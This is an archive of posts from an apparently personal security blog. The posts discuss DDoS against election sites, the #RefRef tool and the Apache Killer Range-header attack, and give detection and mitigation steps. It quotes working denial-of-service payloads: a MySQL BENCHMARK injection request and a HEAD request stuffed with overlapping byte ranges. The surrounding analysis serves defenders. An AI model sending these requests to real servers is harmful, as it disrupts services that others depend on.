DDoS and Elections

Posted May 10th, 2012

I’ve noticed a trend over the past 6 months: DDoS traffic associated with elections. A quick sampling of the news bears this out.

Last week it picked up again with the re-inauguration of Vladimir Putin.

And then yesterday there was Ustream and their awesome response, which, in the Rybolov-paraphrased version, read something like: “We shall go on to the end. We shall fight in France, we shall fight on the Interblagosphere, we shall fight with growing confidence and growing strength in our blocking capabilities, we shall defend our videostreams, whatever the cost may be. We shall fight on the routers, we shall fight on the load balancers, we shall fight in the applications and in the databases, we shall fight by building our own Russian subsite; we shall never surrender!!!!1111” (Ref)

[Photo: Afghanistan Presidential Elections 2004, by rybolov]

So why all this political activity?  A couple of reasons that I can point to:

  • Elections are a point-in-time event. The site is critical for one day, and anything with a short window of time is a good DDoS target.
  • DDoS is easy to do, especially for the Russians. Some of them already have big botnets they’re using for other things.
  • Other DDoS campaigns. Chaotic Actors (Anonymous and their offshoots and factions) have demonstrated that DDoS has, at a minimum, PR value and, at the maximum, financial and political value.
  • Campaign sites are usually put up very quickly. They don’t have much supporting infrastructure or full-time, paid, professional staffing.
  • Elections are IRL Flash Mobs. Traffic to a campaign site increases slowly at first, then exponentially the closer you get to election day. This stresses whatever infrastructure is in place and exposes design decisions that seemed good at the time but don’t scale under the increased load.

So is this the future of political campaigns?  I definitely think it is.  Just like any other type of web traffic, as soon as somebody figures out how to use the technology for their benefit (information sharing => eCommerce => online banking => political fundraising), a generation later somebody else figures out how to deny that benefit.

How to combat election DDoS:

  • Have a plan.  You know that the site is going to get flooded the week of the election.  Prepare accordingly.  *ahem* Expect them.
  • Tune applications and do caching at the database, application, webserver, load balancer, content delivery network, etc.
  • Throw out the dynamic site.  On election day, people just want to know a handful of things.  Put those on a static version of the site and switch to that (a minimal sketch follows this list).  Even if you have to publish by hand every 30 minutes, it’s better than taking a huge outage.
  • Manage the non-web traffic.  SYN and UDP floods have been around for years and years and still work in some cases.  For these attacks you need lots of bandwidth and something that does blocking, which points to a service provider that offers DDoS protection.
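
To make the static-fallback idea concrete, here’s a minimal sketch, assuming a wget-capable host; the site URL and snapshot directory below are placeholders for illustration, not anything from a real campaign:

#!/bin/sh
# Snapshot the dynamic site into plain HTML that any webserver or CDN
# can serve without touching the application or database tier.
# Both values are placeholders -- adjust for your environment.
SITE="http://www.example-campaign.org"
SNAPSHOT="/var/www/static-snapshot"

wget --mirror --convert-links --page-requisites --no-parent \
     --directory-prefix="$SNAPSHOT" "$SITE"

# Run it from cron every 30 minutes and point the webserver docroot
# (or the CDN origin) at $SNAPSHOT when the flood starts:
# */30 * * * * /usr/local/bin/snapshot-site.sh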

It’s going to be an interesting November.




#RefRef the Vaporware DoS Tool

Posted September 23rd, 2011

Ah yes, now you know how I’ve been spending my Saturday mornings lately.

i gotz up at 7AM for #RefRef and all i kan haz is this t-shirt?




A Little Story About a Tool Named #RefRef

Posted September 23rd, 2011

Let me tell you a little story.

So September 17th was Constitution Day, and it was celebrated by protestors in most major cities across the US, with a sizable percentage of folks on Wall Street in NYC.  In conjunction with this protest, a new Denial-of-Service tool, #RefRef, was supposed to be released.  It supposedly used SQL Injection techniques to put a file (originally listed as a JavaScript, but Java is more believable) on application or database servers that then created massive amounts of OS load, thereby crippling the server.  The press coverage of the tool does have the quote of the year: “Imagine giving a large beast a simple carrot, [and then] watching the beast choke itself to death.”  Seriously?

Then came the 17th.  I checked the site and, whoa, there was some Perl code there.  Then I read it, and it looked nothing like the tool as described.  Rumor around the Intertubes was that #RefRef was/is a hoax and that the people responsible were collecting donations for R&D.

This is what the tool that was actually released on the RefRef site does:

GET /%20and%20(select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)) HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

The way this works is that the request asks the database to run an enormous number of benchmark iterations.  This is very similar to SQL Injection in that the request contains database commands, which are then passed by the application server to the database.  In this case, the SQL command is “benchmark”, which executes an expression a specified number of times so you can test query performance.  As you would guess, it generates a ton of database server load.  However, it’s only applicable to MySQL.
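
For reference, the hex blob in the request decodes to the filler string “probando” repeated three times, and you can reproduce the load pattern against a throwaway MySQL instance with a much smaller iteration count.  A sketch only; the mysql client invocation and credentials are assumptions:

# Roughly what the injected query boils down to, run directly against
# a test MySQL server. BENCHMARK(count, expr) evaluates expr count
# times; the captured request uses 99999999999 iterations, which is
# what makes it punishing. Keep the count small on your own box.
mysql -u root -p -e "SELECT BENCHMARK(1000000, 0x70726f62616e646f70726f62616e646f70726f62616e646f);"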




Training the Apache Killers

Posted September 2nd, 2011

Here at IKANHAZFIZMA, we’re training the next generation of Apache webserver Denial-of-Service gurus.  It involves punching bags, some nomz for the troops, and lots of requests for kibble.

ir in training




Apache Killer Effects on Target

Posted August 30th, 2011

Oh noes, the web is broken.  Again.  This time it’s the Apache Killer.  This inspired a little ditty from @CSOAndy based on a Talking Heads tune:

I can’t seem 2 handle the ranges

I’m forked & memlocked & I Can’t spawn

I can’t sleep ’cause my net’s afire

Don’t spawn me I’m a dead server

Apache Killer Qu’est-ce que c’est

da da da da da da da da da dos me now

Fork fork fork fork fork fork fork away

Going back to my blog post last week about Slow Denial-of-Service, let’s look at what Apache Killer is.  Yes kan haz packet capture for packet monkeys (caveat: 2.3MB worth of packets)

Home on the Range

The Apache vulnerability uses an HTTP header called “Range”.  Range is used for partial downloads; these are common in streaming video, in the “resume” feature for large downloads, and in some PDF/eDocument readers (Acrobat Reader does this in a big way).  That way, the client (which is almost never a web browser in this case) can request a specific byte range, or multiple byte ranges, of an object instead of requesting “the whole enchilada”.  This is actually a good thing because it reduces the amount of traffic coming from a webserver, which is why it’s part of the HTTP spec.  However, the spec is broken in some ways:

  • It has no upper limit on the number of ranges in a request.
  • It has no way for a webserver to indicate that it will only service a specific number of ranges (maybe with a 416 response code).
  • The spec allows overlapping ranges.

In the interests of science, I’ll provide a sample of Range-request Apache combined logs so you can see how these work in the wild.  Have a look here; the command used to make this monstrosity was this:

zcat /var/log/apache2/www.guerilla-ciso.com.access.log.*.gz | awk '($9 ~ /206/)' | tail -n 500 > 206traffic.txt
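
For comparison, a legitimate, well-behaved Range request looks roughly like this (a sketch using curl against a placeholder URL on your own server):

# Ask for only the first 100 bytes of an object and dump the response
# headers, discarding the body. A well-behaved server answers with
# "HTTP/1.1 206 Partial Content" plus a Content-Range header describing
# the slice it returned.
curl -s -D - -o /dev/null -H "Range: bytes=0-99" http://localhost/somefile.pdf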

Apache Killer

Now for what Apache Killer does.  You can go check out the code at the listing on the Full Disclosure Mailing List.  Basic steps for this tool:

  • Execute a loop to stitch together a Range header with multiple overlapping ranges (sketched in shell right after this list)
  • Stitch the Range into a HTTP request
  • Send the HTTP request via a net socket
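
The header-stitching step is easy to picture in a few lines of shell.  This is a sketch that only prints the header and sends nothing; note how the first five numbered ranges end up with a start value (5) that is greater than the end value:

# Build the same style of Range header the tool uses: one open-ended
# range followed by "5-0" through "5-1299".
RANGES="bytes=0-"
for i in $(seq 0 1299); do
  RANGES="$RANGES,5-$i"
done
echo "Range:$RANGES"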

The request looks like this.  Note that there are some logic errors in how the Range is stitched together: the first range doesn’t have an end value, and the ranges with an end value below 5 have a start value that comes after the end value:

HEAD / HTTP/1.1
Host: localhost
Range:bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,<rybolov deleted this for brevity’s sake>5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299
Accept-Encoding: gzip
Connection: close

What The Apache Sees

So this brings us to the effect on target.  The normal behavior for a Range request is to do something like the following:

  • Load the object off disk (or from an application handler like php or mod_perl)
  • Return a 206 Partial Content
  • Respond with multiple objects to satisfy the ranges that were requested

In the case of Apache Killer, Apache responds in the following way:

HTTP/1.1 206 Partial Content
Date: Tue, 30 Aug 2011 01:00:28 GMT
Server: Apache/2.2.17 (Ubuntu)
Last-Modified: Tue, 30 Aug 2011 00:18:51 GMT
ETag: "c09c8-0-4abadf4c57e50"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 123040
Connection: close
Content-Type: multipart/byteranges; boundary=4abae89a423c2199d

Of course, in trying to satisfy the Range request, Apache loads the object into memory; but there is a huge number of ranges, and because the ranges overlap, Apache has to load a new copy of the object to satisfy each byte range.  This results in a memory fork.  It also keeps that server process busy, resulting in a process fork attack, much like a Slow DoS would.

The Apache access log (on a Debian derivative it’s in /var/log/apache2/access.log) looks like this:

127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 353 "-" "-"
127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 353 "-" "-"
127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 354 "-" "-"
127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 354 "-" "-"
127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 353 "-" "-"
127.0.0.1 - - [29/Aug/2011:18:00:34 -0700] "HEAD / HTTP/1.1" 206 354 "-" "-"

Note that we’re giving an HTTP response code of 206 (which is good), but there is no referrer or User-Agent.  Let’s filter that stuff out of a full referrer log with some simple shell scripting (this site has an awesome guide to parsing Apache logs):

tail -n 500 access.log | awk '($9 ~ /206/)'

which says this:

  • Grab the last 500 log lines.
  • Find everything that has a 206 response code.

For me, the output is 499 copies of the log lines I showed above because it’s a test VM with no real traffic.  On a production server, you might have to use the entire access log (not just the last 500 lines) to get a larger sample of traffic.
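
If you want to match on the missing referrer and User-Agent directly rather than eyeballing the output, one way to do it is the following (a sketch assuming the standard combined log format, where the quoted referrer and User-Agent follow the byte count):

# Count 206 responses that also have an empty ("-") referrer and an
# empty ("-") User-Agent, which is the pattern Apache Killer leaves:
awk '($9 ~ /206/ && $11 == "\"-\"" && $12 == "\"-\"")' access.log | wc -l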

I’ll also introduce a new fun thing: Apache mod_status.  On a Debian-ish box, you have the command “apachectl status”, which just makes a simple request to the webserver for /server-status.

root@ubuntu:/var/log/apache2# apachectl status
Apache Server Status for localhost

Server Version: Apache/2.2.17 (Ubuntu)
Server Built: Feb 22 2011 18:34:09
__________________________________________________________________

Current Time: Monday, 29-Aug-2011 20:49:57 PDT
Restart Time: Monday, 29-Aug-2011 16:21:02 PDT
Parent Server Generation: 0
Server uptime: 4 hours 28 minutes 54 seconds
Total accesses: 5996 - Total Traffic: 637.5 MB
CPU Usage: u107.39 s2.28 cu0 cs0 - .68% CPU load
.372 requests/sec - 40.5 kB/second - 108.9 kB/request
1 requests currently being processed, 74 idle workers

_________________W_______…………………………………
……………………………………………………….
_________________________…………………………………
_________________________…………………………………
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

The interesting part for me is the server process status codes.  In this case, I have one server (W)riting a reply (actually, servicing the status request, since this is on a VM with no live traffic).  During an attack, all of the server processes’ time is spent writing replies:

root@ubuntu:/var/log/apache2# apachectl status
Apache Server Status for localhost

Server Version: Apache/2.2.17 (Ubuntu)
Server Built: Feb 22 2011 18:34:09
__________________________________________________________________

Current Time: Monday, 29-Aug-2011 20:53:48 PDT
Restart Time: Monday, 29-Aug-2011 16:21:02 PDT
Parent Server Generation: 0
Server uptime: 4 hours 32 minutes 45 seconds
Total accesses: 7064 - Total Traffic: 760.8 MB
CPU Usage: u128.49 s2.65 cu0 cs0 - .801% CPU load
.432 requests/sec - 47.6 kB/second - 110.3 kB/request
51 requests currently being processed, 24 idle workers

___WW__WW__W_WW__W___WWW_…………………………………
……………………………………………………….
__WWWWW_W____WWW__WW_WWWW…………………………………
WWWWWWWWWWWWWWWWWWWWWWWWW…………………………………
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….
……………………………………………………….

Scoreboard Key:
"_" Waiting for Connection, "S" Starting up, "R" Reading Request,
"W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup,
"C" Closing connection, "L" Logging, "G" Gracefully finishing,
"I" Idle cleanup of worker, "." Open slot with no current process

Now, for a Slow HTTP DoS you get some of the memory consumption and the Apache processes forking out of control, but all of the server processes are stuck doing (R)ead operations (i.e., reading a request from clients), if you can even get a response at all (the mod_status query is also an HTTP request, which means you’re doing in-band management during a DoS attack).  This is interesting to me because it helps differentiate the two attacks from a troubleshooting standpoint.
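
If you’d rather script this than stare at the scoreboard, mod_status also has a machine-readable mode.  A quick sketch, assuming mod_status is enabled and /server-status is reachable from localhost:

# Machine-readable view of the same data:
curl -s "http://localhost/server-status?auto" | grep -E '^(BusyWorkers|IdleWorkers|Scoreboard)'

# Count how many workers are stuck sending replies (the "W" state):
curl -s "http://localhost/server-status?auto" | grep '^Scoreboard' | grep -o 'W' | wc -l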

Detecting and Mitigating

This is always the fun part.  Detection should look something like the following; I’ve given examples of all of these for you earlier in this post:

  • Apache forks new processes.  A simple "ps aux | grep apache | wc -l" compared with "grep MaxClients /etc/apache2/apache2.conf" should suffice (a rough sketch follows this list).
  • Apache uses up tons of memory.  You can detect this using top, htop, or even ps.
  • Apache mod_status shows an excess of server daemons performing write operations.
  • Apache combined access logs show an excess of 206 response codes with no referrer and no User-Agent.
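
Here’s a rough cut at the first check, a sketch assuming a Debian-style layout and the prefork MPM (one process per connection); adjust paths and process names for your build:

#!/bin/sh
# Compare running Apache processes against the configured ceiling.
# Riding close to MaxClients while the logs fill up with 206s is a
# strong hint that you're being ranged to death.
RUNNING=$(ps aux | grep '[a]pache2' | wc -l)
LIMIT=$(grep MaxClients /etc/apache2/apache2.conf | head -n 1 | awk '{print $2}')
echo "apache processes: $RUNNING of $LIMIT"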

As far as mitigation goes, the Apache Project put out an awesome post on this, and I can’t really top their advice for the server itself.




Noms and IKANHAZFIZMA

Posted August 26th, 2011

Kickin’ it old-school with some kitteh overflows

iz noms stack overflow



